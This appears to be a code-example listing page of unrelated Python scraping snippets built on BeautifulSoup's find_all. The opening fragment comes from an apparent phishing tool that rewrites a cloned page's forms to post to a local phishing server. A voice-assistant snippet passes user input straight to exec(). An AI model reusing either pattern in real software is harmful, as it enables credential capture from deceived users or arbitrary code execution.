             for tag in request.find_all('form'):
                 tag['method'],tag['action'] ='post',''
         except Exception: pass
         self.CheckHookInjection(request,'Templates/Phishing/web_server/index.html')
     except URLError:
         QMessageBox.warning(self,'Request HTTP','It seems like the server is down.')
         return False
     return True
Example #36
0
def parse_html():
    try: 
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup

    filename = 'temp.html'
    html = open(filename, "r").read()
    parsed_html = BeautifulSoup(html, "lxml")

    links = parsed_html.find_all("a")

    for link in links:
        print(str(link.text) + " Pattern," + ",https://en.wikipedia.org" + str(link.get("href")) + ",Wikipedia")
Example #37
0
def scraping(cve):
    parsers = ['html.parser']
    r = requests.get('https://nvd.nist.gov/vuln/detail/' + cve)
    soup = BeautifulSoup(r.content, "lxml")
    i = 0
    critical = ""
    size = len(soup.find_all('p'))

    description = soup.find_all('p')[24].text

    crit = soup.find_all('p')[27].text
    i = 0
    more = []
    for line in crit.splitlines():

        if i == 4:
            critical = line
        i = i + 1

    if critical.startswith("N") == True:
        critical = "N/A"

    return description, critical
Example #38
0
def genius_scrape_url(url, title):
    proxy = urllib.request.getproxies()
    r = requests.get(url, timeout=10, proxies=proxy)

    try:
        document = BeautifulSoup(r.text, 'html.parser')

        # Genius seems to be returning two types of content
        # One has a 'lyrics' div, the other has Lyrics__Container
        lyrics_div = document.find('div', class_='lyrics')
        if lyrics_div:
            lyrics_paragraphs = []
            [
                lyrics_paragraphs.append(elem.get_text())
                for elem in lyrics_div.find_all('p')
            ]

            lyrics = ''.join(lyrics_paragraphs)

            return LYRICS_TUPLE(lyrics.strip(), url)

        lyrics_containers = document.find_all(
            'div', class_=re.compile('Lyrics__Container*'))
        if lyrics_containers:
            lyrics = ''
            for lyrics_container in lyrics_containers:
                # Genius puts annotations nested with the actual lyrics spans
                # In order to extract the lyrics correctly, need to replace HTML line breaks
                # with \n line breaks
                for br in lyrics_container.find_all('br'):
                    br.replace_with('\n')
                lyrics += lyrics_container.text
            return LYRICS_TUPLE(lyrics, url)

        lyrics_container = document.find(
            'div', class_=re.compile('LyricsPlaceholder__Message*'))
        if lyrics_container:
            # When the song is an instrumental, Genius sometimes puts a LyricsPlaceholder div
            lyrics = '[Instrumental]'
            return LYRICS_TUPLE(lyrics, url)
    except:
        if genius_key == '':
            logger.log(logger.LOG_LEVEL_INFO,
                       SEARCH_ERROR.format(source='Genius', file=title))
        else:
            logger.log(logger.LOG_LEVEL_ERROR,
                       PARSE_ERROR.format(source='Genius', file=title))
        return False

    return False
Example #39
0
async def g_search_custom(message, client, search):
    loop = asyncio.get_event_loop()
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
    search = search.replace(' ', '+')
    async with aiohttp.get('https://www.google.com/search?q={}&start=1&num=1'.format(search), headers=headers) as gr:
        try: 
            from BeautifulSoup import BeautifulSoup
        except ImportError:
            from bs4 import BeautifulSoup
        html = await gr.text()
        results = []
        parsed_html = BeautifulSoup(html, "html.parser")
        for item in parsed_html.find_all('h3', attrs={'class': 'r'}):
            results.append(str(item.a['href']).replace('/url?q=', '').split('&sa=U&ved=')[0])
    await client.send_message(message.channel, 'Top result for `{}`: '.format(search) + ''.join(results[0]))
Example #40
0
def get_completions(request):
    completion1 = ""
    completion2 = ""
    completion3 = ""
    if request.method == "POST":
        html = request.POST.get('content')
        to_parse = find_between(html, "<p>---</p>", "<p>---</p>")
        if (to_parse[0] != ""):
            s = BeautifulSoup(to_parse[0], "html.parser")
            to_complete = ''.join(s.find_all(text=True))
            openai.api_key = os.getenv("OPENAI_API_KEY")
            pre_prompt = ''.join([
                "mount everest 8000m above see level\n",
                "lies in India and nepal\n", "###\n",
                "Mount Everest is 8000m above sea level and spans across India and Nepal\n",
                "###\n", "network for large number devices\n",
                "tested with 10\n", "no errors\n", "50%% less power usage\n",
                "###\n",
                "The network architecture was designed to be used for a large number of devices. We tested it with 10 devices at our lab, no errors while encountered. This implementation also reduces power consumption by 50%% relative to the previous solution.\n",
                "###\n", "first switch trial\n",
                "distributions match error data\n",
                "compare frequencies of strategies used on trial 1\n",
                "distribution of stratigies in older children different than 1 year olds and apes",
                "1 year olds and apes similar", "###\n",
                "the first switch trial revealed that distributions match the error data. Comparison of frequencies of strategies adapted on trial 1 showed that distribution of first-choice strategy in older children differed significantly from those of 1-year-olds and apes, which were in turn very similar to each other.\n",
                "###\n"
            ])
            print(pre_prompt)
            test = openai.Completion.create(engine="davinci-instruct-beta",
                                            prompt=pre_prompt + to_complete +
                                            "\n###\n",
                                            max_tokens=400,
                                            temperature=0.3,
                                            stop="###",
                                            n=3)
            print(test)
            print('---------------')
            print(to_parse[1])
            print(to_parse[2])
            completion1 = test['choices'][0]['text']
            completion2 = test['choices'][1]['text']
            completion3 = test['choices'][2]['text']
            return HttpResponse(json.dumps({
                "completion1": completion1,
                "completion2": completion2,
                "completion3": completion3
            }),
                                content_type="application/json")
def parse_junit_results(output):
    try:
        directory = sys.argv[1]
    except:
        print("Error: Enter a valid local repository")
        return -1
    try:
        path = '../{}/target/surefire-reports/'
        path = path.format(directory)
        files = os.listdir(path)
    except IOError:
        print("Error: Configuration file not found or inaccessible.")
        return -1
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    body = []
    for file in files:
        if file.startswith('TEST'):
            xml = open(path + file)
            soup = BeautifulSoup(xml, 'xml')
            failureLog = ''
            message = ''
            status = ''
            for tag in soup.find_all('testcase'):
                if tag is not None:
                    name = tag['classname']
                    step = tag['name']
                    if tag.find('failure') is not None:
                        status = 'FAIL'
                        try:
                            failure = tag.find('failure')
                            message = failure['message']
                            failureLog = base64.b64encode(
                                bytes(failure.text, 'utf-8'))
                            failureLog = failureLog.decode('utf-8')
                        except:
                            message = 'None'
                            failureLog = ''
                    elif tag.find('skipped') is not None:
                        status = 'SKIP'
                    else:
                        status = 'PASS'
                    value = create_test_logs_json(name, step, status, message,
                                                  failureLog, output)
                body.append(value)
    return body
Example #42
0
def parse(folder, inlinks, outlinks):
    """
    Read all .html files in the specified folder. Populate the two
    dictionaries inlinks and outlinks. inlinks maps a url to its set of
    backlinks. outlinks maps a url to its set of forward links.
    """
    filepath = '.\\'+folder+'\\*.html'
    for path in glob.glob(filepath):
        with open(path, 'r') as f:
            html =  f.readlines()
            inlink = f.name.split('\\')[-1] 
            bs = BeautifulSoup(''.join(html))
            for link in bs.find_all('a'):
                outlink = link.get('href')
                outlinks[inlink].add(outlink)
                inlinks[outlink].add(inlink)
 def parse(self, html):
     '''
     解析给定html字符串里面的微博数据
     -----------------------------------------
     html: 给定的html字符串
     --------------------------------------
     return: blog列表
     '''
     bpos = html.find('<!--feed内容-->')
     epos = html.find('<!--翻页-->', bpos)
     bloghtml = html[bpos:epos].replace('\\/', '/') + '</div>'
     soup = BeautifulSoup(bloghtml)
     blogsouplist = soup.find_all('div', class_='WB_cardwrap WB_feed_type S_bg2 ')
     bloglist = []
     for blogsoup in blogsouplist:
         self.init_blog()
         self._parse_blog(blogsoup)
         bloglist.append(self.blog)
     return bloglist
Example #44
0
def main():
	page = '' 
	try:
		href = 'http://www.google.com.tw/'
		session = requests.Session()
		page = get_page(session, href)
		#print(page)
	except reuqests.exceptions.HTTPError:
		return None

	soup = BeautifulSoup(page)
	#print(soup.prettify()) 
	# using BequtifulSoup 3 
	if soup is None:
		print('soup is none')
	for img in soup.find_all(['img']):
		print img['src'] 
	# /logos/doodles/2014/world-cup-2014-42-4675815216250880-hp.gif 
	'''
Example #45
0
def crawl_page(session, can_url, url, todo, page):
    print ("Crawling " + url)
    page.add_alias(url)
    req = session.get(url)

    print("\t" + req.url)

    soup = BeautifulSoup(req.text, 'html.parser')


    for link in soup.find_all('a'):
        if link.has_attr('href'):
            dest = urljoin(url, link['href'])
            href = urlparse(dest)
            if href.netloc != '' and href.netloc != can_url.netloc: continue
            if href.path == '.': continue

            if dest not in todo:
                todo.add(dest)
    
    page.form_inputs.update(get_form_inputs(soup))
Example #46
0
def crawl(url):
	page = urllib2.urlopen(url)
	contents = page.read()
	soup = BeautifulSoup(contents)
	print(u'豆瓣电影250: 序号 \t影片名\t 评分 \t评价人数')
	for tag in soup.find_all('div', class_='item'):
		m_order = int(tag.find('em').get_text())
		m_name = tag.a.get_text()
		m_year = tag.span.get_text()
		for y in tag.find_all('em'):
			if y.get_text() != m_order :
				score =  y.get_text()
		'''m_rating_num =  int(tag.find_all('em').get_text())'''
		la= []
		for n in tag.find_all('span'):
			la.append(n)

		if len(la[4].get_text() ) <= 4:
			m_rating_num = la[5].get_text()
		else:
			m_rating_num = la[4].get_text()
		print("%s %s %s %s %s" % (m_order, m_name, m_year, score, m_rating_num))
def html_to_json(content, indent=None):
    soup = BeautifulSoup(content, "lxml")
    rows = soup.find_all("tr")
    
    headers = {}
    thead = soup.find("thead")
    if thead:
        thead = thead.find_all("th")
        for i in range(len(thead)):
            headers[i] = thead[i].text.strip().lower()
    data = []
    for row in rows:
        cells = row.find_all("td")
        if thead:
            items = {}
            for index in headers:
                items[headers[index]] = cells[index].text
        else:
            items = []
            for index in cells:
                items.append(index.text.strip())
        data.append(items)
    return json.dumps(data, indent=indent)
def getSubGroups(url, group):
  log.write("-getSubGroups-\n")
  try:
    html = requests.get(url+group.getLink())
    content = BeautifulSoup(html.text, "lxml")
    log.write("->Got "+group.getName()+"'s page content\n")
    #Log file which will contain all twitter ids labeled according to the groups
    subGroup = None
    #Retrieving groups and people listed below these groups
    for div in content.find_all('div', {"class":["size14", "person-box"]}):
      #Subgroup found
      if "size14" in div.attrs['class']:
        if subGroup != None:
          #Adding a subgroup to its repective group
          group.addCollection(subGroup)
        try:
          subGroup = Group()
          subGroup.setLink(div.a['href'])
          subGroup.setName(div.text.encode('utf-8'))
        except Exception, e:
          log.write('erro: '+str(e)+'\n')
      #Person found
      if "person-box" in div.attrs['class']:
        divPerson = div.find('div', 'name')
        try:
          person = Person()
          person.setName(divPerson.text.encode('utf-8'))
          person.setLink(divPerson.a['href'])
          #Retrieving this person's twitter id
          get_twitter_screen_name(url, person)
          #Adding a person to its repective subgroup
          subGroup.addCollection(person)
          #Registering this information in the log file
          f.write(group._name+' - '+subGroup._name+' - '+person._name+' - '+person._screen_name+'\n')
        except Exception, e:
          log.write('erro: '+str(e)+'\n')
Example #49
0
def visit(scheme, domain, resource):
    '''
        Visit 'url' with designated 'user_agent'
        return a 'resources' list with unique elements
    '''
    global _non_visited_links
    temporal_resource_list = list()

    if resource.startswith('/'):
        url = "%s://%s%s" % (scheme, domain, resource)
    else:
        url = "%s://%s/%s" % (scheme, domain, resource)

    print("visiting: url: %s" % url)
    request = requests.get(url, headers=user_agent)
    soup = BeautifulSoup(request.text)
    resources = {
        'anchor': (soup.find_all('a'), 'href'),
        'iframe': (soup.find_all('iframe'), 'src'),
        'frame': (soup.find_all('frame'), 'src'),
        'img': (soup.find_all('img'), 'src'),
        'link': (soup.find_all('link'), 'href'),
        'script': (soup.find_all('script'), 'src'),
        'form': (soup.find_all('form'), 'action'),
        }

    for res in resources.values():
        tags, attr = res
        for tag in tags:
            if tag.has_attr(attr):
                temporal_resource_list.append(tag[attr])

    if resource.startswith('/'):
        resource = resource[1:]

    _visited_links.append(resource)
    _non_visited_links.extend(resource_filter(domain, temporal_resource_list))
import sys, os


try:
    from BeautifulSoup import BeautifulSoup
except:
    from bs4 import BeautifulSoup

import urllib.request, re, csv

html = urllib.request.urlopen("http://snr.unl.edu/lincolnweather/data/monthly-observed-vs-normals.asp")

soup = BeautifulSoup(html, "lxml")
tables = soup.find_all("table")
print(len(tables))
temps = tables[0]
with open("mon_temps_lnk.csv", "w", newline="") as csvfile:
    writer = csv.writer(csvfile)
    for row in temps.find_all("tr"):
        data = []
        for cell in row.find_all("td"):
            data.append(cell.text)
        print(data)
        writer.writerow(data)
		dir_location = "{}/{}".format(settings.cache_directory, user.id);

		if not os.path.exists(dir_location):
			os.makedirs(dir_location);

		if num == 0:
			print("scraping {}...".format(user.permalink));

		num += 1;

		with urllib.request.urlopen(tracks_page) as response:
			html = response.read();

			soup = BeautifulSoup(html, "html.parser");

			for article in soup.find_all(class_='audible'):
				track = article.find('a', attrs={"itemprop": "url"}, href=True);
				timestamp = article.find('time');

				file_location = "{}/{}.json".format(dir_location, track['href'].split("/")[-1:][0]);

				if os.path.exists(file_location):
					continue;

				info = {
					"id": -1,
					"title": track.text,
					"duration": -1,
					"timestamp": timestamp.text,
					"description": "API request was rejected, unable to scrape for description.",
					"permalink": "http://soundcloud.com{}".format(track['href']),
def parser_core(word_extract) :
   
  parse_soup = BeautifulSoup(word_extract)
  
  text_file.write("Main Word:")
  text_file.write("\n")
  for word in parse_soup.find_all("b"):  
    text_file.write(word.get_text())
    text_file.write("\n")
  
  text_file.write('\n')
  
  text_file.write("Part of Speech:")
  text_file.write("\n")
  for word in parse_soup.find_all("i"):  
    text_file.write(word.get_text())
    text_file.write("\n")
    
  text_file.write("\n")  
  
  text_file.write("Definition:")
  text_file.write("\n")
  definition = re.search(re.compile('<td>(?!<).*</td>'), str(word_extract)).group()
  Definition_Soup = BeautifulSoup(definition)
  for word in Definition_Soup.find_all("td"):  
    text_file.write(word.get_text())
    text_file.write("\n")
    
  text_file.write("\n")  
  
  text_file.write("Synonyms:")
  text_file.write("\n")
  
  while True :
    check_syn = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(word_extract))
    
    if check_syn == None :
      text_file.write("None")
      text_file.write("\n")
      break
      
    syn_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(word_extract)).group()
    synonyms_soup = BeautifulSoup(syn_ant)
    for word in synonyms_soup.find_all("span"):
      parser_synonyms = word.get_text()
      parser_synonyms = re.sub('^\n', '', str(parser_synonyms))
      parser_synonyms = re.sub(',[ \t]', ',\n', str(parser_synonyms))
      parser_synonyms = re.sub(',', '', str(parser_synonyms))
      text_file.write(parser_synonyms)
      text_file.write("\n")
      
    if True : break    
  
  text_file.write("\n")
  
  
  text_file.write("Antonyms:") 
  text_file.write("\n")
  syn_ant = re.sub(re.compile('<td><span>.*?</span></td>', re.DOTALL), '', str(syn_ant), 1)
  
  while True :
    check_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(syn_ant))
    
    if check_ant == None : 
      text_file.write("None")
      text_file.write("\n")
      text_file.write("\n")
      break
      
    syn_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(syn_ant)).group()
    antonyms_soup = BeautifulSoup(syn_ant)
    for word in antonyms_soup.find_all("span"):
      parser_antonyms = word.get_text()
      parser_antonyms = re.sub('^\n', '', str(parser_antonyms))
      parser_antonyms = re.sub(',[ \t]', ',\n', str(parser_antonyms))
      parser_antonyms = re.sub(',', '', str(parser_antonyms))
      text_file.write(parser_antonyms)
      text_file.write("\n")
      text_file.write("\n")
      
    if True : break
Example #53
0
from BeautifulSoup import BeautifulSoup
import urllib2

webpage = urllib2.urlopen('http://en.wikipedia.org/wiki/Main_Page')
soup = BeautifulSoup(webpage)
for anchor in soup.find_all('a'):
    print(anchor.get('href', '/'))
Example #54
0
def main(input=input, *args):
    response = "hi"
    choose = False
    choice = "go"
    YorN = None
    words = [""]
    chunk = 0
    link = 0
    global droid, prompt

    #### MAIN LOOP:
    while response is not "":

        ################### input and convert to list of words
        print "input1=" + input, "response1=" + response  # , "choice="+choice

        while input == "" or input == "nospeech" or input is None:
            input = droid.recognizeSpeech().result
            if not response:
                print "noresponse"
                input = droid.recognizeSpeech().result  # exec(channel)
            if choose:
                print "choose"
                prompt = choice
                choice = droid.recognizeSpeech().result
                input = "choose"  # exec(channel)
            if not choose and response:
                input = droid.recognizeSpeech().result  # prompt = response+'>'; exec(channel)

            if input is None:
                time.sleep(7)
                input = ""
                # print 2 #exec(channel)
            else:
                print "input2=", input

            # exec('print 2')
            # if input is None:
            # prompt = response+'>'
            # input = raw_input('>')
        try:
            words = input.split(" ")
        except:
            pass

        #### set context(s)
        '''if context: 
			phrase2 = raw_input(str(context)+ ' is ')
			context['action'] = phrase2; context = None
			print dctn[df[0]]['action']
			#confirm = raw_input('confirm?')
			#if confirm == 'y':  context = confirm; context = None; input ="okay"'''

        ################### direct commands
        if input == "quit":
            response = ""
        if input == "save":
            PBcreateBranch()
            break
        if input == "dctn":
            response = str(dctn)
            print response, dctn
            continue
        if input == "hi":
            response = "hello"
        if prompt == "anything else? (yes/no)>":
            if YorN == "yes":
                pass
            if YorN == "no":
                break

            ################### keyword based commands

            ########## definitions
        if " is " in input and not "what is " in input and not words[0] == "is":
            df = input.split(" is ")  # definition
            try:
                dctn[df[0]] = df[1]
            except:
                print "error, not entered"  # dctn[df[0]]=[df[1]]
            if df[1] == "action":
                dctn[df[0]] = {"action": ""}
                response = "how " + df[0] + "?"
                context = dctn[df[0]]
            response = "okay"
            # continue

        if " is not " in input:
            split = input.split(" is not ")  # remove definition
            try:
                dctn[split[0]].remove(split[1])
            except:
                pass

            ######## question
        if "?" in input:
            input = input.strip("?")
            if "what is" in input:
                q = input.split("what is ")
                # print dctn[q[1]]
                if q[1] in dctn:
                    response = dctn[q[1]]
                else:
                    try:
                        input = "search " + q[1]
                    except:
                        response = q[1] + " is not known"

                    ######## google
        if "search" in input:
            query = input.replace("search ", "")
            print "searching " + query
            from pygoogle import pygoogle

            g = pygoogle(query)
            g.pages = 1
            results = g.__search__()
            # print str(results)
            choose = True
            response = results[link]["content"]
            # response = repr(response)
            response.encode("ascii")
            # response.encode('ascii', 'ignore');

            ##################################################################################################################################
        if choose:
            print "chooseTrue"
            if choice == "next":
                link = link + 1
                print "link=", link
                response = results[link]["content"]
                # response = repr(response)
                response.encode("ascii")
            if choice == "go":
                br = mechanize.Browser()
                br.set_handle_robots(False)
                br.addheaders = [
                    (
                        "User-agent",
                        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1",
                    )
                ]
                page = br.open(url)
                response = page.read()
                soup = BeautifulSoup(response, "html.parser")
                # paras=soup.p #findAll('p', text=True)
                VALID_TAGS = ["p", "span"]  # , 'ul', 'li', 'br']'div',
                paras = [
                    i.text.encode("ascii", "ignore") for i in soup.find_all(VALID_TAGS)
                ]  ################## removes <p>s
                paras = filter(None, paras)
                paras = [i.replace("\n", ".").replace("\r", ".") for i in paras]
                paras = [
                    i.replace("(", "parens").replace(")", "parens").replace("[", "bracket").replace("]", "bracket")
                    for i in paras
                ]

                input = raw_input("pause")

                ######## actions
        if "e" in input:
            exec1 = input.split("e ")  # exec
            try:
                exec (exec1[1])
                continue
            except Exception, e:
                print str(e)

        if "do" in input:  # action
            try:
                exec (dctn[words[1]]["action"] + ' "' + str("".join(words[2:99])) + '"')
                continue
            except Exception, e:
                print str(e)
Example #55
0
			#f=open('/home/sunying/hello-jane/weathercrawler/f.txt','w')
			#f.write(self.html)
			#f.close()
			self.page.close()
			return self.soup
				
crawler= Crawler(url)
csoup=crawler.getHtml(url)
#f=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html','w')
csoup=str(csoup)
#print csoup
#f.close()
#soup=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html')
soup = BeautifulSoup(csoup)
#soup= soup.prettify() 
csoup=soup.find_all("div",id="tqyDiv")
csoup=csoup.find_all("div",id="gdDiv")
csoup=csoup.find_all("div",class_="hzDqDivClass")
#,id="gdDiv")
#print soup
res=re.compile(r'<div id=\"dq\d\" onclick=\".+\">([\u4e00-\u9fa5]{2})</div>')
result=res.findall(str(csoup))
print result
#print len(result)
#f=open('/home/sunying/hello-jane/weathercrawler/re.csv','w')
with open('/home/sunying/hello-jane/weathercrawler/hzqx.csv', 'wb') as csvfile:
    #spamwriter = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)
    i=0
    while i < len(result):
        spamwriter = csv.writer(csvfile, dialect='excel')
        spamwriter.writerow(result[i])
Example #56
0
        #f.close()
        self.page.close()
        return self.soup
month=1
while month<=12:            
    crawler= Crawler(year,month,city)
    #print crawler.url_back()
    csoup=crawler.getHtml(crawler.url_back())
    #f=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html','w')
    csoup=str(csoup)
    #print csoup
    #f.close()
        #soup=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html')
    soup = BeautifulSoup(csoup)
    #soup= soup.prettify() 
    csoup=soup.find_all("table")
    #print soup
    res=re.compile(r'<td><strong>(\d|\d{2})</strong></td>'+r'<td>(-?\d+\.\d|-?\d{2}|-|\d|-?\d|-?\d+\.\d{2}|-?\d+\.\d{2})</td>'*10)
    result=res.findall(str(csoup))
    result=list(result)
    print result
    #f=open('/home/sunying/hello-jane/weathercrawler/hzqx/try.csv','a')
    #f.write(str(result))
    #f.close()
    #print len(result)
    #
    #f=open('/home/sunying/hello-jane/weathercrawler/hzqx/try.csv','a')
    with open('/home/sunying/hello-jane/weathercrawler/hzqx/hzweather.csv','a') as csvfile:
        #spamwriter = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)
        spamwriter = csv.writer(csvfile, dialect='excel')
        spamwriter.writerow(['%4d-%02d'%(2012,month)])
Example #57
0
# coding:utf-8
import requests
from BeautifulSoup import BeautifulSoup

DownPath = "~/material/spider/www.meizitu.com/pic"

head = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'}
TimeOut = 5
PhotoName = 0
c = '.jpeg'
PWD = DownPath
for x in range(1, 4):
    site = "http://www.meizitu.com/a/qingchun_3_%d.html" % x
    Page = requests.session().get(site, headers=head, timeout=TimeOut)
    Coding = (Page.encoding)
    Content = Page.content  #.decode(Coding).encode('utf-8')
    ContentSoup = BeautifulSoup(Content)
    jpg = ContentSoup.find_all('img', {'class': 'scrollLoading'})
    for photo in jpg:
        PhotoAdd = photo.get('data-original')
        PhotoName += 1
        Name = (str(PhotoName) + c)
        r = requests.get(PhotoAdd, stream=True)
        with open(PWD + Name, 'wb') as fd:
            for chunk in r.iter_content():
                fd.write(chunk)
print ("You have down %d photos" % PhotoName)
Example #58
0
<td headers="pltab1time">19:50:01</td>
<td class="bold" headers="pltab1artist">Jason Derulo</td>
<td headers="pltab1title">In my head</td></tr>
<tr class="wsOdd"><td headers="pltab1time">19:45:30</td>
<td class="bold" headers="pltab1artist">Lena</td>
<td headers="pltab1title">Neon (Lonely People)</td>
</tr></tbody></table></div>
"""

soup = BeautifulSoup(html_doc2)


#print(soup.prettify())
#print (soup.find_all('td'))
#print (soup.find_all("td", "headers"))

print (soup.find_all(headers=re.compile("pltab1artist", "pltab1title")))

#print (soup.title.string)
#print (fotze)

"""
for headers in soup.find_all('td'):
    print (soup.find(headers="pltab1artist"))
    print (soup.find(headers="pltab1title"))
"""

#for headers in soup.find_all('td'):
#    print(headers.get('td'))

#headers="pltab1artist"
Example #59
0
        if imgs[1]:    
            ensure_dir(loc)    
        total_page_div = soup.find('span', class_='red')    
        if (hasattr(total_page_div, 'text')):    
            total_page = int(total_page_div.text)    
        else:    
            total_page = 1            
        for i in range(2, total_page + 1):    
            imgs[i] = get_img_from_url(url + "&pn=" + str(i))            
        for i in imgs:    
            for j in imgs[i]:    
                links.add(j.get('src'))            
        thread.start_new(down_links_to_folder, (links, dirname))            
        return links   
    except Exception, e:    
        print 'error..', e
        
baidu_base_url = 'http://tieba.baidu.com'
baidu_homepage = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=%E5%A7%90%E8%84%B1")
soup = BeautifulSoup(baidu_homepage.content)
titles = soup.find_all('a', target="_blank", class_="j_th_tit")
urls = {}

for i, title in enumerate(titles):
    urls[i] = baidu_base_url + title.get('href')
    print urls[i], title.text.encode('gbk', 'ignore')

for i in urls:
    thread.start_new(get_tieba_img_url_from_url, (urls[i] + '?see_lz=1',))

#time.sleep(100000)